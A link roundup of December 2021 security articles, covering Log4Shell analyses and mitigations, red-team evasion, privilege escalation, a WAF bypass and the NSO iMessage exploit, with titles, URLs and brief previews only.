Process Ghosting https://pentestlaboratories.com/2021/12/08/process-ghosting/
Pentest Laboratories
Process Ghosting
Understanding how endpoint products work to identify malicious actions can lead to the discovery of security gaps which can be used for evasion during red team operations. The technique Process Her…
Nice explanation on the basics » A simple x86_64 stack based buffer overflow exploitation with gdb https://oxagast.org/posts/simple-buffer-overflow-exploitation-walkthrough-gdb/
oxagast.org oxasploits
A simple x86_64 stack based buffer overflow exploitation with gdb
Background
Malicious IFilter: a DLL waiting patiently (not even loaded) until the file with a particular extension appears, then it executes as the LOCALSYSTEM https://github.com/gtworek/PSBits/tree/master/IFilter
GitHub
PSBits/IFilter at master · gtworek/PSBits
Simple (relatively) things allowing you to dig a bit deeper than usual. - gtworek/PSBits
FIN13: A Cybercriminal Threat Actor Focused on Mexico https://www.mandiant.com/resources/fin13-cybercriminal-mexico
Google Cloud Blog
FIN13: A Cybercriminal Threat Actor Focused on Mexico | Mandiant | Google Cloud Blog
Threat news: TeamTNT stealing credentials using EC2 Instance Metadata https://sysdig.com/blog/teamtnt-aws-credentials/
Sysdig
Threat news: TeamTNT stealing credentials using EC2 Instance Metadata
TeamTNT malware targeted a Kubernetes Pod and attempted to steal AWS credentials using the EC2 instance metadata.
Is your web browser vulnerable to data theft? XS-Leak explained https://blog.malwarebytes.com/explained/2021/12/is-your-web-browser-vulnerable-to-data-theft-xs-leak-explained/
Malwarebytes Labs
Is your web browser vulnerable to data theft? XS-Leak explained
IT security researchers recently exposed new cross-site leak (XS-Leak) attacks against modern-day browsers. But what is XS-Leak anyway?
Driver-Based Attacks: Past and Present https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
Rapid7
Driver-Based Attacks: Past and Present | Rapid7 Blog
Leaking EPROCESS address of the specific SYSTEM processes https://blog.rewolf.pl/blog/?p=1683
A phishing document signed by Microsoft – part 1 https://outflank.nl/blog/2021/12/09/a-phishing-document-signed-by-microsoft/
Nice reading after all the madness » Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package https://www.lunasec.io/docs/blog/log4j-zero-day/
Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/
Cado
Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228
Log4J is an open-source logging platform running on Java and built-in to many web platforms. Reports of exploitation started on December 9th.
CVE-2021-44228 vulnerability in Apache Log4j library https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210
Securelist
CVE-2021-44228 vulnerability in Apache Log4j library
The summary of the critical vulnerability CVE-2021-44228 in the Apache Log4j library, technical details and mitigations.
Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/
Sysdig
Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j Remote Code Execution (RCE) | Sysdig
The CVE-2021-44228 is a CRITICAL vulnerability that allows attackers to execute arbitrary code on a machine. Updating log4j to 2.16.0.
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft News
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Microsoft is tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2. Get technical info and guidance for using Microsoft security solutions to protect against attacks.
Windows Privilege Escalation: Scheduled Task/Job (T1573.005) https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/
Hacking Articles
Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
Learn how to exploit Windows Scheduled Task/Job (T1573.005) for privilege escalation using misconfigured task scheduler settings.
Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html
How I was able to bypass Cloudflare WAF for SQLi payload https://infosecwriteups.com/how-i-was-able-to-bypass-cloudflare-waf-for-sqli-payload-b9e7a4260026
Medium
How i was able to bypass Cloudflare WAF for SQLi payload
Bypassing Cloudflare for achieving SQL Injection
A strategy to land your first pentest job https://blog.pentesterlab.com/a-strategy-to-land-your-first-pentest-job-25209a351689
Pentesterlab
A strategy to land your first pentest job - PentesterLab's Blog
Learn the strategy to get a job in pentesting or web security. Understand different levels of knowledge, from basic to expert, in hacking, code review, and application security. Get insights on how focusing on one category can help you master pentesting and…
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
Worth reading » A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
projectzero.google
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Project Zero
Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and...